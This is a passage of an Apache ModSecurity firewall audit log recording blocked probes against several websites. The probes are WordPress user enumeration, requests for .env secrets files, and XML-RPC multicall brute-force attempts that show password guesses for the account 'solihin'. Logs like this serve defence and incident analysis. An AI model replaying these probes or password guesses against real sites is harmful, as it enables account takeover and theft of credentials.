103.236.140.4 8181 --5e22ba7f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.44.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.44.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e22ba7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e22ba7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748068525532529 3115 (- - -) Stopwatch2: 1748068525532529 3115; combined=1345, p1=443, p2=870, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e22ba7f-Z-- --aa072945-A-- [24/May/2025:13:50:22 +0700] aDFsLuunkxaVeh4NwhbRQQAAAEU 103.236.140.4 50280 103.236.140.4 8181 --aa072945-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.210.124.106 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.210.124.106 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --aa072945-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix!!! --aa072945-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa072945-E-- --aa072945-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.210.124.106 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748069422386586 4657 (- - -) Stopwatch2: 1748069422386586 4657; combined=3557, p1=389, p2=3010, p3=0, p4=0, p5=93, sr=76, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa072945-Z-- --a22b2d1f-A-- [24/May/2025:13:54:57 +0700] aDFtQeunkxaVeh4NwhbRVgAAAE8 103.236.140.4 50352 103.236.140.4 8181 --a22b2d1f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.210.124.106 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.210.124.106 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a22b2d1f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinAdmin2024 --a22b2d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a22b2d1f-E-- --a22b2d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.210.124.106 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748069697473326 4877 (- - -) Stopwatch2: 1748069697473326 4877; combined=3795, p1=369, p2=3232, p3=0, p4=0, p5=110, sr=72, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a22b2d1f-Z-- --cb6e305b-A-- [24/May/2025:14:00:08 +0700] aDFueDvI5DIWBJ2mFG5K1wAAAMk 103.236.140.4 50434 103.236.140.4 8181 --cb6e305b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.120.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.120.168 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cb6e305b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb6e305b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748070008422815 775 (- - -) Stopwatch2: 1748070008422815 775; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb6e305b-Z-- --d478244b-A-- [24/May/2025:14:03:10 +0700] aDFvLuunkxaVeh4NwhbRgAAAAEY 103.236.140.4 50500 103.236.140.4 8181 --d478244b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d478244b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinSolihin.2020 --d478244b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d478244b-E-- --d478244b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748070190641217 4685 (- - -) Stopwatch2: 1748070190641217 4685; combined=3542, p1=389, p2=2995, p3=0, p4=0, p5=92, sr=79, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d478244b-Z-- --bbe3e86d-A-- [24/May/2025:14:13:41 +0700] aDFxpeO2UzDOKMmK0i6i0wAAAA4 103.236.140.4 50778 103.236.140.4 8181 --bbe3e86d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.69.98.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.69.98.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bbe3e86d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbe3e86d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748070821931326 2131 (- - -) Stopwatch2: 1748070821931326 2131; combined=1029, p1=370, p2=632, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbe3e86d-Z-- --29fa3520-A-- [24/May/2025:14:27:01 +0700] aDF0xfmzt4abyoi_U9n-qwAAAIY 103.236.140.4 51024 103.236.140.4 8181 --29fa3520-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 196.13.207.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 196.13.207.92 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --29fa3520-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin& --29fa3520-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --29fa3520-E-- --29fa3520-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748071621776202 6535 (- - -) Stopwatch2: 1748071621776202 6535; combined=4695, p1=466, p2=3958, p3=36, p4=42, p5=119, sr=84, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29fa3520-Z-- --eb4d0177-A-- [24/May/2025:14:32:55 +0700] aDF2J_mzt4abyoi_U9n-swAAAJU 103.236.140.4 51112 103.236.140.4 8181 --eb4d0177-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --eb4d0177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb4d0177-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748071975640161 782 (- - -) Stopwatch2: 1748071975640161 782; combined=327, p1=292, p2=0, p3=0, p4=0, p5=34, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb4d0177-Z-- --9393aa6c-A-- [24/May/2025:14:33:49 +0700] aDF2XeO2UzDOKMmK0i6i6gAAABU 103.236.140.4 51130 103.236.140.4 8181 --9393aa6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.232.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.232.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9393aa6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9393aa6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072029668870 3163 (- - -) Stopwatch2: 1748072029668870 3163; combined=1380, p1=459, p2=889, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9393aa6c-Z-- --85f7b142-A-- [24/May/2025:14:35:30 +0700] aDF2wjvI5DIWBJ2mFG5LGAAAAMU 103.236.140.4 51158 103.236.140.4 8181 --85f7b142-B-- GET / HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 54.188.172.214 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 54.188.172.214 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.9 Proxy-Connection: Keep-Alive --85f7b142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f7b142-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072130474063 2021 (- - -) Stopwatch2: 1748072130474063 2021; combined=833, p1=408, p2=396, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f7b142-Z-- --8056c051-A-- [24/May/2025:14:35:30 +0700] aDF2wvmzt4abyoi_U9n-uwAAAJc 103.236.140.4 51160 103.236.140.4 8181 --8056c051-B-- GET / HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 35.93.69.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 35.93.69.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.9 Proxy-Connection: Keep-Alive --8056c051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8056c051-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072130474100 2120 (- - -) Stopwatch2: 1748072130474100 2120; combined=848, p1=405, p2=406, p3=0, p4=0, p5=37, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8056c051-Z-- --c38dfd1a-A-- [24/May/2025:14:35:55 +0700] aDF22-O2UzDOKMmK0i6i7gAAAAE 103.236.140.4 51176 103.236.140.4 8181 --c38dfd1a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c38dfd1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c38dfd1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748072155536392 848 (- - -) Stopwatch2: 1748072155536392 848; combined=320, p1=271, p2=0, p3=0, p4=0, p5=49, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c38dfd1a-Z-- --ba893d74-A-- [24/May/2025:14:44:21 +0700] aDF41eunkxaVeh4NwhbSAgAAAE8 103.236.140.4 51374 103.236.140.4 8181 --ba893d74-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 149.36.17.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.36.17.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba893d74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba893d74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072661757744 3046 (- - -) Stopwatch2: 1748072661757744 3046; combined=1360, p1=497, p2=833, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba893d74-Z-- --d772db24-A-- [24/May/2025:14:45:16 +0700] aDF5DOO2UzDOKMmK0i6i_gAAAAA 103.236.140.4 51418 103.236.140.4 8181 --d772db24-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 Accept-Charset: utf-8 --d772db24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d772db24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748072716634979 661 (- - -) Stopwatch2: 1748072716634979 661; combined=264, p1=228, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d772db24-Z-- --1b272669-A-- [24/May/2025:14:47:45 +0700] aDF5ofmzt4abyoi_U9n-8QAAAI0 103.236.140.4 51482 103.236.140.4 8181 --1b272669-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 137.184.206.114 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 137.184.206.114 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1b272669-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinSonnx123!@# --1b272669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b272669-E-- --1b272669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 137.184.206.114 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072865649453 5020 (- - -) Stopwatch2: 1748072865649453 5020; combined=3703, p1=381, p2=3149, p3=0, p4=0, p5=104, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b272669-Z-- --d5429544-A-- [24/May/2025:14:50:18 +0700] aDF6OjvI5DIWBJ2mFG5LPQAAAMQ 103.236.140.4 51576 103.236.140.4 8181 --d5429544-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 137.184.206.114 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 137.184.206.114 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d5429544-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihintestsolihin --d5429544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5429544-E-- --d5429544-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 137.184.206.114 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748073018623612 6123 (- - -) Stopwatch2: 1748073018623612 6123; combined=4348, p1=491, p2=3684, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5429544-Z-- --d3340d48-A-- [24/May/2025:14:52:32 +0700] aDF6wOO2UzDOKMmK0i6jEgAAABA 103.236.140.4 51694 103.236.140.4 8181 --d3340d48-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 137.184.206.114 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 137.184.206.114 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d3340d48-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinJarvis@2025 --d3340d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3340d48-E-- --d3340d48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 137.184.206.114 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748073152196243 6385 (- - -) Stopwatch2: 1748073152196243 6385; combined=4591, p1=519, p2=3777, p3=0, p4=0, p5=168, sr=103, sw=127, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3340d48-Z-- --6555552d-A-- [24/May/2025:15:07:52 +0700] aDF-V-O2UzDOKMmK0i6jaAAAAAo 103.236.140.4 52016 103.236.140.4 8181 --6555552d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: 